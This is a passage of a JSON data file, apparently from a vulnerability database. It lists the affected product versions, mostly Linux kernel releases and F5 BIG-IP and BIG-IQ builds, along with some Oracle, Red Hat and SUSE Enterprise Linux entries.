        "version": "12.0.0"
      },
      {
        "model": "big-ip aam hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "big-ip asm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "big-iq cloud hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "linux enterprise server for sap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.14"
      },
      {
        "model": "big-ip asm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "big-ip gtm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip ltm hf11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip apm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.110.104.180"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "big-ip aam build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.01.14.628"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "big-ip afm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "big-ip edge gateway hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "big-ip apm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip gtm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "big-ip link controller hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.1"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "big-iq cloud hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "big-ip asm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip asm hf11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip asm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip afm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "big-ip pem hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip apm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "big-ip apm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip aam hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip ltm build 685-hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.3"
      },
      {
        "model": "big-ip analytics hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37"
      },
      {
        "model": "big-ip ltm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip ltm hf11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip asm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "enterprise linux hpc node optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "big-ip link controller hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip afm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip afm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip afm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip afm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip analytics build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-1"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "big-ip aam build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.110.104.180"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "big-ip apm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip pem hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "big-ip ltm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "big-ip aam hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.6"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip analytics hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "big-ip analytics hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip link controller hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "big-ip analytics build 685-hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.13"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip websafe",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "big-ip pem hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip link controller hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip afm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "big-ip apm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip apm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "enterprise linux workstation optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip analytics hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip apm hf11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3113"
      },
      {
        "model": "big-ip link controller hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip asm hf5",
